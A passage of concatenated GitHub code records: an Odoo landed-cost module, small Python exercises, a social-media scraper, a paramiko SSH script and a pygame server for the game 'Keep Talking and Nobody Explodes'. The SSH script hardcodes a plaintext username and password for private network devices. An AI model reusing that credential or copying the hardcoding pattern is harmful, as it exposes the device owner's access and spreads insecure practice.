self.env['stock.valuation.adjustment.lines']\n AdjustementLines.search([('cost_id', 'in', self.ids)]).unlink()\n\n digits = self.env['decimal.precision'].precision_get('Product Price')\n towrite_dict = {}\n for cost in self.filtered(lambda cost: cost._get_targeted_move_ids()):\n total_qty = 0.0\n total_cost = 0.0\n total_weight = 0.0\n total_volume = 0.0\n total_line = 0.0\n all_val_line_values = cost.get_valuation_lines()\n for val_line_values in all_val_line_values:\n for cost_line in cost.cost_lines:\n val_line_values.update({'cost_id': cost.id, 'cost_line_id': cost_line.id})\n self.env['stock.valuation.adjustment.lines'].create(val_line_values)\n total_qty += val_line_values.get('quantity', 0.0)\n total_weight += val_line_values.get('weight', 0.0)\n total_volume += val_line_values.get('volume', 0.0)\n\n former_cost = val_line_values.get('former_cost', 0.0)\n # round this because former_cost on the valuation lines is also rounded\n total_cost += tools.float_round(former_cost, precision_digits=0) if digits else former_cost\n\n total_line += 1\n\n for line in cost.cost_lines:\n value_split = 0.0\n for valuation in cost.valuation_adjustment_lines:\n value = 0.0\n if valuation.cost_line_id and valuation.cost_line_id.id == line.id:\n if line.split_method == 'by_quantity' and total_qty:\n per_unit = (round(line.price_unit) / total_qty)\n value = valuation.quantity * per_unit\n elif line.split_method == 'by_weight' and total_weight:\n per_unit = (round(line.price_unit) / total_weight)\n value = valuation.weight * per_unit\n elif line.split_method == 'by_volume' and total_volume:\n per_unit = (round(line.price_unit) / total_volume)\n value = valuation.volume * per_unit\n elif line.split_method == 'equal':\n value = (round(line.price_unit) / total_line)\n elif line.split_method == 'by_current_cost_price' and total_cost:\n per_unit = (round(line.price_unit) / total_cost)\n value = valuation.former_cost * per_unit\n else:\n value = (round(line.price_unit) / total_line)\n\n if digits:\n value = tools.float_round(value, precision_digits=0, rounding_method='UP')\n fnc = min if line.price_unit > 0 else max\n value = fnc(value, line.price_unit - value_split)\n value_split += value\n\n if valuation.id not in towrite_dict:\n towrite_dict[valuation.id] = value\n else:\n towrite_dict[valuation.id] += value\n for key, value in towrite_dict.items():\n AdjustementLines.browse(key).write({'additional_landed_cost': (value)})\n return True\n\n def _check_sum(self):\n \"\"\" Check if each cost line its valuation lines sum to the correct amount\n and if the overall total amount is correct also \"\"\"\n prec_digits = self.env.company.currency_id.decimal_places\n for landed_cost in self:\n total_amount = sum(landed_cost.valuation_adjustment_lines.mapped('additional_landed_cost'))\n if not tools.float_is_zero(total_amount - landed_cost.amount_total, precision_digits=prec_digits):\n return False\n\n val_to_cost_lines = defaultdict(lambda: 0.0)\n for val_line in landed_cost.valuation_adjustment_lines:\n val_to_cost_lines[val_line.cost_line_id] += val_line.additional_landed_cost\n if any(not tools.float_is_zero(round(cost_line.price_unit,) - val_amount, precision_digits=prec_digits)\n for cost_line, val_amount in val_to_cost_lines.items()):\n return False\n return True\n\n def search_tags(self):\n \n if self.cost_lines:\n raise ValidationError(_(\"The cost lines were already generated.\"))\n\n invoices = self.env['account.move'].search([]).filtered(\n lambda r: self.analytic_tag_id in r.analytic_tag_ids)\n\n if not invoices:\n raise ValidationError(_(\n \"There are no results for this analytic tag.\"))\n\n cost_lines = {}\n for invoice_line in invoices.mapped('invoice_line_ids'):\n if invoice_line.product_id.landed_cost_ok:\n cost_lines.update({\n invoice_line.product_id: cost_lines.get(\n invoice_line.product_id, 0.0) + invoice_line.price_unit,\n })\n\n if not cost_lines:\n raise ValidationError(_(\n \"No landed cost product was found for this analytic tag.\"))\n\n self.write({\n 'cost_lines': [(0, 0, {\n 'product_id': product.id,\n 'name': product.name or '',\n 'split_method': product.split_method_landed_cost or 'equal',\n 'price_unit': price,\n 'account_id': product.property_account_expense_id.id or product.categ_id.property_account_expense_categ_id.id,\n }) for product, price in cost_lines.items()],\n })\n\n\n def get_valuation_lines(self):\n \"\"\"Overwrites the original method to include average in the validation\n of the cost methods.\"\"\"\n lines = []\n\n for move in self.mapped('picking_ids').mapped('move_lines'):\n if move.product_id.valuation != 'real_time' or move.product_id.cost_method not in ['fifo', 'average']:\n continue\n vals = {\n 'product_id': move.product_id.id,\n 'move_id': move.id,\n 'quantity': move.product_qty,\n 'former_cost': move.product_id.standard_price,\n 'weight': move.product_id.weight * move.product_qty,\n 'volume': move.product_id.volume * move.product_qty\n }\n lines.append(vals)\n\n if not lines and self.mapped('picking_ids'):\n raise UserError(_(\n 'The selected picking does not contain any move that would be '\n 'impacted by landed costs. Landed costs are only possible for '\n 'products configured in real time valuation with real price '\n 'costing method. Please make sure it is the case, or you '\n 'selected the correct picking'))\n return lines\n\n\nclass AdjustmentLines(models.Model):\n _inherit = 'stock.valuation.adjustment.lines'\n\n new_cost = fields.Float(\n compute='_compute_new_cost',\n help=\"Former Cost (Per unit) + Additional Landed Cost / Quantity\")\n\n def _compute_new_cost(self):\n \"\"\"Computes the new cost amount\"\"\"\n for record in self:\n record.new_cost = (\n record.final_cost + record.additional_landed_cost\n / record.quantity)\n","repo_name":"thiemed3/Thiemed","sub_path":"as_thimed_invoice/models/stock_landed_cost.py","file_name":"stock_landed_cost.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13920003187","text":"prices = [13.21, 78.01, 43, 98.06, 39.92, 27.67, 87, 7, 51, 61.32]\nprices_2 = []\n\nprint(id(prices))\n\nfor price in prices:\n big_price = int(price)\n small_price = price % big_price\n small_price = int(small_price * 100)\n prices_2.append(f'{big_price:02d} руб. {small_price:02d} коп.')\n\nall_price = ', '.join(prices_2)\nprint(all_price)\n\nprices.sort()\nprint(id(prices), prices)\n\nprices_rev_sort = sorted(prices, reverse=True)\nprint(prices_rev_sort)\n\nprices.sort(reverse=True)\nprint(prices[:5])\n","repo_name":"pakEA/pythons_homeworks","sub_path":"task_2_5.py","file_name":"task_2_5.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22167354738","text":"n, m, a, c, x0 = map(int, input().split())\r\narr = []\r\nfor _ in range(n):\r\n x0 = (a*x0 + c)%m\r\n arr.append(x0)\r\ndef bs(x):\r\n lo, hi = 0, len(arr)-1\r\n while lo <= hi:\r\n mid = (lo + hi)//2\r\n if arr[mid] == x: return True\r\n elif arr[mid] < x: lo = mid+1\r\n else: hi = mid-1\r\n return False\r\nprint(sum(map(bs, arr)))","repo_name":"RussellDash332/kattis","sub_path":"src/Out of Sorts/outofsorts.py","file_name":"outofsorts.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"38550191797","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# read the text\r\ntxt=open('data.txt','r').read()\r\ntxt=txt.lower()\r\nfor ch in \"~@#$%^&*()_-+=<>?/,.:;{}[]|\\'\"\"\":\r\n txt=txt.replace(ch,'')\r\nwords=txt.split()\r\n\r\n\r\n#count the words\r\ncounts={}\r\nsumcount=0\r\nfor word in words:\r\n counts[word]=counts.get(word,0)+1\r\n sumcount=sumcount + 1\r\n\r\n\r\nprint('There are'+str(sumcount) +'words.')\r\nprint('They are:')\r\nfor word in counts.keys():\r\n print(word+': '+str(counts[word]))\r\n","repo_name":"wang6268/1zcp","sub_path":"114ly/114ly.py","file_name":"114ly.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23217264426","text":"import datetime\nimport time\nimport re\nfrom facepy import GraphAPI\nimport tweepy\nimport project_credentials\nfrom database_stuff import storeStatement, db\n\n\"\"\" Facebook stuff \"\"\"\nfb = GraphAPI(\n project_credentials.fb_token\n)\n\ndef storeFbPostsFrom(posts, username, leaning):\n \"\"\" Saves in DB Facebook posts from a given user, next to its political leaning \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n if not type(posts) is list:\n raise Exception(\"A lists of posts is required\")\n if not username:\n username = \"unidentified username\"\n\n for statement in posts:\n storeStatement(statement, leaning, username)\n\n\ndef getFbPostsFrom(username, since=(2015, 6, 1)):\n \"\"\" Creates a list if FB posts for a given user \"\"\"\n since_date = datetime.date(*since)\n since_unix_time = time.mktime(since_date.timetuple())\n\n result_pages = fb.get(\n \"{}/posts\".format(username),\n page = True,\n since = since_unix_time\n )\n print(result_pages.next())\n posts = []\n for page in result_pages:\n for post in page[\"data\"]:\n if \"message\" in post:\n statement = removeUrls(post[\"message\"])\n if isRelevantStatement(statement):\n print(statement.encode(\"utf-8\"))\n posts.append(statement)\n return posts\n\n\n\ndef searchFbPostsByHashtag(hashtag, leaning, since=(2015, 6, 1)):\n \"\"\" It appears searching posts is deprecated, we may have to give up on this one \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n since_date = datetime.date(*since)\n since_unix_time = time.mktime(since_date.timetuple())\n\n result_pages = fb.search(\n hashtag,\n \"post\",\n page = True,\n since = since_unix_time\n )\n\n for page in result_pages:\n for post in page[\"data\"]:\n if \"message\" in post:\n statement = removeUrls(post[\"message\"])\n if isRelevantStatement(statement):\n print(statement.encode(\"utf-8\"))\n storeStatement(statement, leaning, \"Default_author\")\n\n\n\n\"\"\" Twitter stuff \"\"\"\nauth = tweepy.OAuthHandler(\n project_credentials.twitter_consumer_key,\n project_credentials.twitter_consumer_secret\n)\n\nauth.set_access_token(\n project_credentials.twitter_access_token,\n project_credentials.twitter_access_token_secret\n)\n\napi = tweepy.API(auth)\n\ndef getTweetsFromHashtag(hashtag, leaning, since=(2015, 6, 1)):\n \"\"\" Searches tweets by hashtag, and stores them in DB, next to its political leaning \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n for tweet in limitHandled(tweepy.Cursor(api.search, q=hashtag).items()):\n if tweet.created_at < datetime.datetime(*since): break #If we reached the \"since\" date, just break\n if isRetweet(tweet): tweet.text = tweet.retweeted_status.text #If it's a retweet, access the original tweet\n tweet.text = removeUrls(tweet.text) #URLs shouldn't influence the classification decision\n #If the tweets are too short, or already in DB, disregard them\n if not isRelevantStatement(tweet.text) or isAlreadyInDb(tweet.text): continue\n print(tweet.created_at)\n print(tweet.text.encode(\"utf-8\"))\n #Otherwise, store the tweet in DB\n storeStatement(tweet.text, leaning, \"Default_author\")\n\n\ndef getTweetsFrom(username, leaning, since=(2015, 6,1)):\n \"\"\" Gets a given user's tweets, and stores them in DB, next to its political leaning \"\"\"\n if leaning not in [\"left\", \"right\"]:\n raise Exception(\"Not a valid political leaning\")\n\n for tweet in limitHandled(tweepy.Cursor(api.user_timeline, id=username).items()):\n if tweet.created_at < datetime.datetime(*since): break\n tweet.text = removeUrls(tweet.text)\n if not isRelevantStatement(tweet.text): continue\n print(tweet.created_at)\n print(tweet.text.encode(\"utf-8\"))\n storeStatement(tweet.text, leaning, username)\n\n\ndef limitHandled(cursor):\n \"\"\" Wraps a tweepy cursor with an iterator that handles rate limits \"\"\"\n while True:\n try:\n yield cursor.next()\n except tweepy.TweepError:\n print(\"Waiting for Twitter's time limit to expire...\")\n time.sleep(20 * 60)\n\n\n\n\n\"\"\" Useful extra stuff \"\"\"\n\ndef removeUrls(statement):\n \"\"\"Takes a string input, and removes the urls in it\"\"\"\n urls = re.findall(\"http[s]?://[^ ]+\", statement)\n if urls:\n for url in urls:\n statement = statement.replace(url, \"\")\n return statement\n\n\ndef isRelevantStatement(statement, min_len = 60):\n return len(statement) > min_len\n\ndef isRetweet(tweet):\n if hasattr(tweet, \"retweet_status\"):\n return True\n\ndef isAlreadyInDb(statement):\n c = db.execute(\"SELECT * FROM statements WHERE statement = ?\", (statement, ))\n if c.fetchone():\n return True\n","repo_name":"lalvarezguillen/political_leaning_classifier","sub_path":"tools/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29634412823","text":"import paramiko\nimport time\nimport threading\nimport multiprocessing\nonuMud = [\"\", \"\", \"\"]\nonu = [\"3\",\"4\",\"6\",\"7\",\"13\",\"21\"]\noutput =\"\"\noutput2 =\"\"\nout = \"\"\ndef pros1(resultado):\n global out\n global output\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect('10.45.2.2', port=22, username='donavan', password='Ora@2020!')\n transport = client.get_transport()\n session = transport.open_session()\n # session.setblocking(0) # Set to non-blocking mode\n session.get_pty()\n session.invoke_shell()\n session.send('\\n')\n session.recv(8000)\n session.send(\"co t\")\n time.sleep(1)\n session.send('\\n')\n print(\"agora\")\n time.sleep(20)\n session.send(\"show gpon onu state gpon-olt_1/2/2\\n\")\n time.sleep(3)\n output = session.recv(100000)\n resultado += output.decode('utf-8')\n client.close()\ndef pros2(resultado):\n global out\n global output2\n client2 = paramiko.SSHClient()\n client2.load_system_host_keys()\n client2.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client2.connect('10.45.2.14', port=22, username='donavan', password='Ora@2020!')\n transport2 = client2.get_transport()\n session2 = transport2.open_session()\n # session.setblocking(0) # Set to non-blocking mode\n session2.get_pty()\n session2.invoke_shell()\n session2.send('\\n')\n session2.recv(8000)\n session2.send(\"co t\")\n time.sleep(1)\n session2.send('\\n')\n print(\"agora\")\n time.sleep(20)\n session2.send(\"show gpon onu state gpon-olt_1/2/2\\n\")\n time.sleep(3)\n output2 = session2.recv(100000)\n resultado += output2.decode('utf-8')\n client2.close()\n\n\n'''t1 = threading.Thread(target=pros1)\nt2 = threading.Thread(target=pros2)\nt1.start()\nt2.start()'''\nif __name__ == '__main__':\n p1 = multiprocessing.Process(target=pros1)\n p2 = multiprocessing.Process(target=pros2)\n p1.start()\n p2.start()\n p1.join()\n p2.join()\n#zte 1: 1685, 95, 23","repo_name":"ParkUniverso/spuRev","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44697145765","text":"#TODO: happy ding on disarm\nimport time\nimport string\nimport random\nimport socket\nimport json\nimport pygame\n\nfrom select import select\n\npygame.init()\n\nleds_available = ['IBM', 'CAR', 'RAC', 'LIT', 'ARM']\nleds_on = {'IBM': 'A', 'CAR': 'B', 'RAC': 'C', 'LIT': 'D', 'ARM': 'E'}\n\n#Bomb status codes\nINITIALISING = 0\nACTIVE = 1\nDEFUSED = 2\nEXPLODED = 3\n\n#Colour presets\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nblue = (0, 0, 127)\nbright_blue = (0, 0, 255)\nred = (127, 0, 0)\ngreen = (0, 127, 0)\ndim_green = (0,60,0)\nbright_green = (0, 255, 0)\nbright_red = (255, 0, 0)\n\n#Hard-coded LED image sizes. TODO rescale based on display res\nled_dimensions = (36,37)\n\ngreen_led = pygame.image.load('./images/green_led.png')\ngreen_led = pygame.transform.scale(green_led, led_dimensions)\nred_led = pygame.image.load('./images/red_led.png')\nred_led = pygame.transform.scale(red_led, led_dimensions)\nblue_led = pygame.image.load('./images/blue_led.png')\nblue_led = pygame.transform.scale(blue_led, led_dimensions)\norange_led = pygame.image.load('./images/orange_led.png')\norange_led = pygame.transform.scale(orange_led, led_dimensions)\npurple_led = pygame.image.load('./images/purple_led.png')\npurple_led = pygame.transform.scale(purple_led, led_dimensions)\n\nled_images = [orange_led, purple_led, blue_led]\noff_led = pygame.image.load('./images/off_led.png')\noff_led = pygame.transform.scale(off_led, led_dimensions)\n\nbackground = pygame.image.load('./images/diamond_plate_sm.jpg')\ninfo_screen = pygame.image.load('./images/timer_screen.png')\ninfo_screen = pygame.transform.scale(info_screen, (700, 55))\ntimer_screen = pygame.image.load('./images/timer_screen.png')\n\n\n#Uncomment/comment the below lines based on whether you want automatic dimensions (for fullscreen) or smaller (for windowed)\n\n#Auto dimensions\n#gameDisplay = pygame.display.set_mode()\n\n#Fixed dimensions\ngameDisplay = pygame.display.set_mode((1280, 800))\n\nbg_width, bg_height = background.get_rect().size\ndisplay_width = pygame.display.get_surface().get_width()\ndisplay_height = pygame.display.get_surface().get_height()\ntilex = display_width // bg_width + 1\ntiley = display_height // bg_height + 1\n\n#Uncomment to enable full screen\n#gameDisplay = pygame.display.set_mode((display_width, display_height), pygame.FULLSCREEN, 16)\n\nv_margin = 50\nh_margin = 80\n\nv_centre = display_height // 2\nh_centre = display_width // 2\n\nl_column = h_margin\nr_column = display_width - l_column\nt_row = v_margin\nb_row = display_height - t_row\n\nclock = pygame.time.Clock()\n\npygame.display.set_caption('KTaNE Bomb Server')\n\npygame.time.set_timer(pygame.USEREVENT, 1000)\n\ndef quitgame():\n pygame.quit()\n exit()\n\ndef text_objects(text, font, colour, background=None):\n textSurface = font.render(text, True, colour, background)\n return textSurface, textSurface.get_rect()\n\ndef button(msg, x, y, w, h, ic, ac, action=None):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\n pygame.draw.rect(gameDisplay, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n action()\n else:\n pygame.draw.rect(gameDisplay, ic, (x, y, w, h))\n\n textSurf, textRect = text_objects(msg, smallText, white)\n textRect.center = ((x + (w / 2)), (y + (h / 2)))\n gameDisplay.blit(textSurf, textRect)\n\ndef format_time(timer):\n minutes = timer // 60\n seconds = timer % 60\n if seconds < 10:\n seconds = f\"0{seconds}\"\n return f\"{minutes}:{seconds}\"\n\ndef get_digits(toggle_compat=False):\n digits = '00'\n if toggle_compat:\n number = random.randint(5,31)\n if number > 10:\n digits = str(number)\n else:\n digits = '0' + str(number)\n else:\n digits = str(random.randint(0,99))\n return digits\n\n#Faux-randomly generates a serial number with these constraints:\n#CCNNCNNCNN (where C is a letter character and N is a digit)\n#At least one S and one R character\n#The first two digits following an S or R character shall be >=05 and <= 31\ndef generate_serial():\n letters = string.ascii_uppercase\n serial = ''\n die = random.randint(0,5)\n if die == 0:\n serial = 'S' + random.choice(letters)\n elif die == 1:\n serial = random.choice(letters) + 'S'\n elif die == 2:\n serial = random.choice(letters) + 'R'\n elif die == 3:\n serial = 'R' + random.choice(letters)\n else:\n serial = random.choice(letters) + random.choice(letters)\n serial += get_digits('S' in serial or 'R' in serial)\n if 'S' in serial:\n serial += random.choice(letters) + get_digits()\n else:\n serial += 'S' + get_digits(True)\n if 'R' in serial:\n serial += random.choice(letters) + get_digits()\n else: \n serial += 'R' + get_digits(True)\n return serial\n\n#Randomly selects 3 LEDs and uses a coin toss to turn them on or off\ndef generate_leds():\n leds = random.sample(range(0,4),3)\n led_code = ''\n for led in leds:\n if random.choice([True, False]):\n led_code += str(led)\n else:\n led_code += leds_on[leds_available[led]]\n return led_code\n\ndef decode_leds(code):\n #should ultimately return JSON?\n leds = {}\n for led in code:\n if led in '01234':\n leds[leds_available[int(led)]] = 'off'\n else:\n led = int(led, 16) - 10\n leds[leds_available[led]] = 'on'\n return leds\n\ndef new_bomb(timer):\n fuse_start = time.time() + 15\n fuse_end = fuse_start + timer*60\n serial = generate_serial()\n leds = generate_leds()\n status = INITIALISING\n strikes = 0\n max_strikes = 3\n modules = 0\n global module_leds\n module_leds = {}\n bomb = {'fuse_start':fuse_start, 'fuse_end':fuse_end, 'serial':serial, 'leds':leds, 'status':status, 'strikes':strikes, 'max_strikes':max_strikes, 'modules':modules}\n pygame.mixer.music.load('./sound/setup.ogg')\n pygame.mixer.music.play(0)\n return bomb\n\ndef add_strike(bomb):\n if bomb['status'] == ACTIVE:\n bomb['strikes'] += 1\n if bomb['strikes'] >= bomb['max_strikes']:\n bomb['status'] = EXPLODED\n pygame.mixer.Sound.play(explode)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(strike)\n return bomb\n\ndef disarm_module(bomb):\n if bomb['status'] == ACTIVE:\n global disarmed_modules\n bomb['modules'] -= 1\n disarmed_modules += 1\n if bomb['modules'] <= 0 or (easy_mode and disarmed_modules >= 3):\n bomb['status'] = DEFUSED\n pygame.mixer.Sound.play(success)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(chime)\n print(f\"Modules: {bomb['modules']}\")\n return bomb\n\ndef pick_led_colours(leds):\n led_colours = []\n for led in leds:\n led_colours.append(random.choice(led_images))\n return led_colours\nfuse = 5\neasy_mode = False\nbomb = new_bomb(fuse)\ndisarmed_modules = 0\nled_colours = pick_led_colours(bomb['leds'])\njson_bomb = json.dumps(bomb)\n\nCONNECTION_LIST = []\nRECV_BUFFER = 4096\nPORT = 9876\n\nSERVER_SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nSERVER_SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nSERVER_SOCKET.bind((\"\", PORT)) #listens on all IPs\n\n#10 connections\nSERVER_SOCKET.listen(10)\n\nCONNECTION_LIST.append(SERVER_SOCKET)\nprint(\"Bomb server started.\")\n\ndef restart_bomb():\n global bomb \n global disarmed_modules\n disarmed_modules = 0\n bomb = new_bomb(fuse)\n\n#25 char display?\ndef info_display(message):\n screen_width, screen_height = info_screen.get_rect().size\n screen_x = h_centre - (screen_width // 2)\n screen_y = t_row\n gameDisplay.blit(info_screen, (screen_x, screen_y))\n chars = len(message)\n diff = 25 - chars\n message = message + (' ' * diff)\n TextSurf, TextRect = text_objects(message, info_text, bright_green)\n TextRect.left = screen_x + 20\n TextRect.top = screen_y + 5\n gameDisplay.blit(TextSurf, TextRect)\n\ndef place_serial(serial):\n serial = 'SN- ' + serial\n TextSurf, TextRect = text_objects(serial, serial_text, white, black)\n TextRect.left = l_column\n TextRect.top = t_row * 3\n gameDisplay.blit(TextSurf, TextRect)\n\ndef place_led(text, status, x, y, colour):\n TextSurf, TextRect = text_objects(text, serial_text, white, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n if status == 'off':\n colour = off_led\n gameDisplay.blit(colour, (x - 40,y - 10)) \n\ndef place_modules(leds):\n TextSurf, TextRect = text_objects('Modules to disarm', serial_text, white, black)\n mod_width, mod_height = TextRect.size\n TextRect.left = r_column - mod_width\n TextRect.top = t_row * 3\n gameDisplay.blit(TextSurf, TextRect)\n x = TextRect.left + 60\n y = TextRect.top + mod_height + 20\n item = 0\n for led in leds:\n gameDisplay.blit(leds[led], (x, y))\n x = x + 100\n item += 1\n if item % 3 == 0:\n y += 50\n x = TextRect.left + 60\n for i in range(0,6-len(leds)):\n gameDisplay.blit(off_led, (x, y))\n x = x + 100\n item += 1\n if item % 3 == 0:\n y += 50\n x = TextRect.left + 60\n #TODO: blank box behind LEDs\n\ndef place_strikes(strikes):\n screen_width, screen_height = info_screen.get_rect().size\n x = h_centre - 110\n y = v_centre + screen_height + 100\n exes = ' ' + strikes * 'X '\n blanks = ' X X X '\n\n TextSurf, TextRect = text_objects('STRIKES', serial_text, white, black)\n TextRect.left = x + 35\n TextRect.top = y - 30\n gameDisplay.blit(TextSurf, TextRect)\n\n TextSurf, TextRect = text_objects(blanks, strike_text, black, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n\n TextSurf, TextRect = text_objects(exes, strike_text, red, black)\n TextRect.left = x\n TextRect.top = y\n gameDisplay.blit(TextSurf, TextRect)\n\n\n#Hard coded max of 6 modules - expand? Add optional limits?\nmodule_leds = {}\n\n#Set up fonts\ninfo_text = pygame.font.Font('./fonts/led_dots.ttf', 50)\nserial_text = pygame.font.Font('./fonts/emboss.ttf', 30)\nstrike_text = pygame.font.Font('./fonts/inlanders.otf', 80)\nlargeText = pygame.font.Font('./fonts/digital-7.ttf', 115)\ntimer_backing = pygame.font.Font('./fonts/digital-7.ttf', 115)\nsmallText = pygame.font.Font('./fonts/inlanders.otf', 20)\n\n#Set up sounds\npygame.mixer.init()\nbeep = pygame.mixer.Sound(\"./sound/beep.ogg\")\nchime = pygame.mixer.Sound(\"./sound/chime.ogg\")\nstrike = pygame.mixer.Sound(\"./sound/error.ogg\")\nexplode = pygame.mixer.Sound(\"./sound/explode.ogg\")\nsuccess = pygame.mixer.Sound(\"./sound/success.ogg\")\n\n#Main game loop\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n if bomb['status'] == INITIALISING:\n if time.time() > bomb['fuse_start']:\n if bomb['modules'] > 0:\n bomb['status'] = ACTIVE\n pygame.mixer.music.stop()\n pygame.mixer.music.load('./sound/strings.ogg')\n pygame.mixer.music.play(0)\n else:\n bomb['status'] = DEFUSED\n bomb = new_bomb(fuse)\n led_colours = pick_led_colours(bomb['leds'])\n elif bomb['status'] == ACTIVE:\n if time.time() > bomb['fuse_end']:\n #kaboom\n bomb['status'] = EXPLODED\n pygame.mixer.Sound.play(explode)\n pygame.mixer.music.stop()\n else:\n pygame.mixer.Sound.play(beep)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n quitgame()\n if event.key == pygame.K_v:\n easy_mode = True\n fuse = 6\n print(f'Easy mode: {easy_mode}')\n restart_bomb()\n elif event.key == pygame.K_x:\n easy_mode = False\n fuse = 5\n restart_bomb()\n elif event.type == pygame.QUIT:\n quitgame()\n gameDisplay.fill(black)\n timer = '0:00'\n\n\n for i in range(0, tiley):\n for j in range(0,tilex):\n gameDisplay.blit(background, (j*bg_width,i*bg_height))\n\n #TODO: Create a function for writing to the middle message\n if bomb['status'] == INITIALISING:\n info_display('Bomb is arming...')\n timer = format_time(int(bomb['fuse_start']-time.time()))\n elif bomb['status'] == ACTIVE:\n info_display('Bomb is active!')\n timer = format_time(int(bomb['fuse_end']-time.time()))\n elif bomb['status'] == DEFUSED:\n info_display('Bomb has been defused.') #TODO: have a nice day\n elif bomb['status'] == EXPLODED:\n info_display('Bomb exploded.') #TODO: Sad face\n\n timer_screen = pygame.transform.scale(timer_screen, (218, 88))\n gameDisplay.blit(timer_screen, (h_centre - 109, v_centre - 40))\n TimerSurf, TimerRect = text_objects(timer, largeText, bright_green)\n TimerRect.center = ((display_width / 2), (display_height / 2))\n back_surf, back_rect = text_objects('8:88', timer_backing, dim_green)\n back_rect.center = ((display_width / 2), (display_height / 2))\n gameDisplay.blit(back_surf, back_rect)\n gameDisplay.blit(TimerSurf, TimerRect)\n \n led_x = r_column - l_column\n led_y = b_row - 150\n leds = decode_leds(bomb['leds'])\n led_colour = 0\n for led in leds:\n place_led(led, leds[led], led_x, led_y, led_colours[led_colour])\n led_y += 50\n led_colour += 1\n\n place_strikes(bomb['strikes'])\n\n place_serial(bomb['serial'])\n\n place_modules(module_leds)\n\n button(\"Restart\", l_column, b_row - 50, 100, 50, green, bright_green, restart_bomb)\n button(\"Quit\", l_column + 120, b_row - 50, 100, 50, red, bright_red, quitgame)\n\n pygame.display.update()\n dt = clock.tick(15)\n\n READ_SOCKETS, WRITE_SOCKETS, ERROR_SOCKETS = select(CONNECTION_LIST, [], [],0)\n for SOCK in READ_SOCKETS:\n if SOCK == SERVER_SOCKET:\n SOCKFD, ADDR = SERVER_SOCKET.accept()\n CONNECTION_LIST.append(SOCKFD)\n print(f'\\rClient {ADDR[0]} {ADDR[1]} connected.')\n else:\n try:\n DATA = SOCK.recv(RECV_BUFFER)\n if DATA:\n request = DATA.decode().strip()\n if 'status' == request:\n print('Requested status...')\n SOCK.send(str(bomb['status']).encode())\n elif 'serial' == request:\n print('Requested serial...')\n SOCK.send(bomb['serial'].encode())\n elif 'leds' == request:\n print('Requested LEDs')\n SOCK.send(bomb['leds'].encode())\n elif 'strikes' == request:\n print('Requested strikes')\n SOCK.send(str(bomb['strikes']).encode())\n elif 'defuser' == request:\n print('Requested defuser name.')\n #TODO: not part of object yet\n elif 'fuse_start' == request:\n print('Requested fuse start time.')\n SOCK.send(str(bomb['fuse_start']).encode())\n elif 'fuse_end' == request:\n print('Requested fuse end time.')\n SOCK.send(str(bomb['fuse_end']).encode())\n elif 'time_remaining' == request:\n print('Requested time remaining.')\n SOCK.send(str(int(bomb['fuse_end']-time.time())).encode())\n elif 'add_strike' == request:\n print('Adding a strike.')\n bomb = add_strike(bomb)\n SOCK.send(str(bomb['strikes']).encode())\n elif 'disarm' in request:\n #TODO: allow only one disarm per module registered\n mod_id = request[6:]\n print(f'Disarm request: {mod_id}')\n bomb = disarm_module(bomb)\n module_leds[mod_id] = green_led\n SOCK.send(str(bomb['status']).encode())\n elif 'register' in request:\n mod_id = request[8:]\n registered = 0\n print(f'Register module: {mod_id}')\n if bomb['status'] == INITIALISING and not (mod_id in module_leds):\n bomb['modules'] += 1\n module_leds[mod_id] = red_led\n registered = 1\n print('Registered!')\n print(f\"Modules: {bomb['modules']}\")\n elif bomb['status'] == ACTIVE and mod_id in module_leds:\n registered = 1\n print('Already registered!')\n SOCK.send(str(registered).encode())\n elif 'mode' == request:\n if easy_mode:\n response = 'easy'\n else:\n response = 'hard'\n SOCK.send(response.encode())\n elif 'bomb_object' == request:\n print('Requested whole object.')\n SOCK.send(json_bomb.encode())\n else:\n print('Unknown request...')\n except Exception as msg:\n print(type(msg).__name__, msg)\n print(f'\\rClient {ADDR[0]} {ADDR[1]} disconnected.')\n SOCK.close()\n try:\n CONNECTION_LIST.remove(SOCK)\n except ValueError as msg:\n print(f'{type(msg).__name__}:{msg}')\n continue\nSERVER_SOCKET.close()\n","repo_name":"paralinguist/KTANE_network","sub_path":"bomb_server.py","file_name":"bomb_server.py","file_ext":"py","file_size_in_byte":16333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18777642767","text":"# -*- coding:utf-8 